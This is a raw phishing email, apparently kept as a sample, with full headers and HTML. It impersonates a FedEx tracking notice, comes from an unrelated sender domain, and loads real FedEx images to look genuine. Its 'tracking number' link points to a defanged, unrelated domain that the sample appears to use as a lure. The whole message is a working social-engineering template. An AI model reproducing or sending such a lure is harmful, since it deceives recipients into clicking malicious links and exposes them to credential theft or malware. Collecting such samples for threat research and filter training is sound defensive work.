Received: from norcomsystems.com ([75.148.144.201]) by [removed] 
	(envelope-from <fedex@norcomsystems.com>) [removed] for [removed];
	Tue, 26 Feb 2019 15:16:41 +0000
Message-ID: <869617F9.862635B1@norcomsystems.com>
Date: Tue, 26 Feb 2019 09:16:34 -0600
Reply-To: "FedEx" <fedex@norcomsystems.com>
From: "FedEx Inc." <fedex@norcomsystems.com>
X-Mailer: Molto for iPad (2.1.0.8604)
MIME-Version: 1.0
TO: [removed]
Subject: Here is Your FedEx Tracking Number
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: 7bit


<html>
<head>
<meta>
<meta>
</head>
<body>
<div
style="font-size: 10pt; font-family:
Verdana,Arial,Helvetica,sans-serif;"><br>
<div
style="margin: 0pt; background: rgb(255, 255, 255) none repeat scroll 0%;
table-layout: fixed; width: 100% ! important; -moz-background-clip:
-moz-initial; -moz-background-origin: -moz-initial;
-moz-background-inline-policy: -moz-initial; font-family:
Arial,Helvetica,sans-serif;">
<table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0"
width="100%">
<tbody>
<tr>
<td align="center" bgcolor="#ffffff" width="100%">
<table border="0" cellpadding="0" cellspacing="0" width="600">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="145"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
<td align="left" valign="top" width="428">
<table border="0" cellpadding="0" cellspacing="0"
width="100%">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;"
align="left" height="5" valign="top"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="5"
width="1"></td>
</tr>
<tr>
<td
style="font-size: 14px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); text-decoration: none;"
align="left" valign="top"><br>
</td>
</tr>
</tbody>
</table>
</td>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="27"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="600">
<tbody>
<tr>
<td align="left" valign="top" width="145">
<table border="0" cellpadding="0" cellspacing="0"
height="10" width="100%">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;"
align="left" height="10" valign="top"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="10"
width="1"></td>
</tr>
</tbody>
</table>
<table style="text-align: center;" border="0"
cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="center" valign="top"><img alt="FedEx"
style="color: rgb(77, 20, 140);"
src="http://www.fedex.com/ENS/images/fedex_collective_logo_desktop.png"
border="0" height="157" width="44"></td>
</tr>
</tbody>
</table>
</td>
<td align="left" valign="top" width="428">
<div
style="overflow: hidden; display: none; width: 0px; max-height: 0px;">
<table
style="overflow: hidden; display: none; width: 0px; max-height: 0px;"
border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left" valign="top"><img
style="overflow: hidden; display: none; width: 0px; max-height: 0px;"
alt="FedEx"
src="http://www.fedex.com/ENS/images/fedex_collective_logo_mobile.png"
border="0" height="1" width="1"><br>
</td>
</tr>
<tr>
<td style="line-height: 0px; font-size: 0px;"
align="left" valign="top"><img
style="overflow: hidden; line-height: 0px; font-size: 0px; display: none;
width: 0px; max-height: 0px;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"><br>
</td>
</tr>
<tr>
<td style="line-height: 0px; font-size: 0px;"
align="left" valign="top"><img
style="overflow: hidden; line-height: 0px; font-size: 0px; display: none;
width: 0px; max-height: 0px;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"><br>
</td>
</tr>
</tbody>
</table>
</div>
<table border="0" cellpadding="0" cellspacing="0"
height="80" width="100%">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;"
align="left" height="80" valign="top"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="80"
width="1"></td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0"
width="100%">
<tbody>
<tr>
<td
style="font-size: 34px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140);"
valign="top">Online FedEx Tracking</td>
</tr>
</tbody>
</table>
</td>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="27"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="600">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="145"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
<td align="left" valign="top" width="428">
<table border="0" cellpadding="0" cellspacing="0"
width="100%">
<tbody>
<tr>
<td
style="font-size: 18px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); line-height: 145%;"
valign="top">Click on the tracking
number below to see
shipment facts:</td>
</tr>
<tr>
<td
style="font-size: 16px; font-family: Arial,Helvetica,sans-serif; color:
rgb(51, 51, 51); line-height: 145%;"
valign="top"><br>
</td>
</tr>
<tr>
<td
style="font-size: 16px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); line-height: 145%;"
valign="top">
<hr> </td>
</tr>
<tr>
<td
style="font-size: 18px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); line-height: 145%;"
valign="top">Tracking number&nbsp; <a
href="hxxp://rickjohnstoncpa[.]com?[removed]=[removed]"
style="color: rgb(77, 20, 140);" target="_blank">739524765621</a></td>
</tr>
<tr>
<td style="line-height: 0px; font-size: 0px;"
height="20" valign="top"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="20"
width="1"></td>
</tr>
<tr>
<td
style="font-size: 16px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); line-height: 145%;"
valign="top">
<table border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td
style="font-size: 18px; font-family: Arial,Helvetica,sans-serif; color:
rgb(51, 51, 51);"
valign="top" width="28%"><br>
</td>
<td width="30%">
<table border="0" cellpadding="0"
cellspacing="0" width="100%">
<tbody>
<tr width="100%">
<td align="center" width="100%"><img
alt="Delivery progress bar" style="display: block;"
src="http://www.fedex.com/fedextrack/images/notif-images/notif-fedex-progre
ss-bar-details-in-transit.png"
border="0" height="35" width="100%"></td>
</tr>
<tr width="100%">
<td
style="font-size: 14px; font-family: Arial,Helvetica,sans-serif; color:
rgb(0, 0, 0);"
align="center" width="100%">In transit</td>
</tr>
</tbody>
</table>
</td>
<td
style="font-size: 18px; font-family: Arial,Helvetica,sans-serif; color:
rgb(51, 51, 51);"
valign="top" width="42%"><br>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td
style="font-size: 16px; font-family: Arial,Helvetica,sans-serif; color:
rgb(51, 51, 51); line-height: 145%;"
valign="top"><br>
</td>
</tr>
<tr>
<td
style="font-size: 16px; font-family: Arial,Helvetica,sans-serif; color:
rgb(77, 20, 140); line-height: 145%;"
valign="top">
<hr> </td>
</tr>
</tbody>
</table>
</td>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="27"><img
style="line-height: 0px; font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="600">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="145"><img style="font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
<td align="left" valign="top" width="428">
<table border="0" cellpadding="0" cellspacing="0"
width="100%">
<tbody>
<tr>
<td style="line-height: 0px; font-size: 0px;"
height="10" valign="top"><img style="font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="10"
width="1"></td>
</tr>
<tr>
<td
style="padding: 0px 0px 0px 5px; font-size: 11px; font-family:
Arial,Helvetica,sans-serif; color: rgb(153, 153, 153); line-height: 135%;"
valign="top">Disclaimer<br>
<br>
To find the most recent
status of your shipment, click
on the tracking number
above.<br>
<br>
The track update have been sent to you by FedEx.<br>
<br>
Thank you for your business.<br>
<br>
2019 FedEx. The content in this note is
guarded by copyright and
trademark laws under U.S. and international laws.
See our privacy policy.
.</td>
</tr>
</tbody>
</table>
</td>
<td style="line-height: 0px; font-size: 0px;" align="left"
valign="top" width="27"><img style="font-size: 0px; display: block;"
src="http://www.fedex.com/ENS/images/spacer.gif" border="0" height="1"
width="1"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</body>
</html>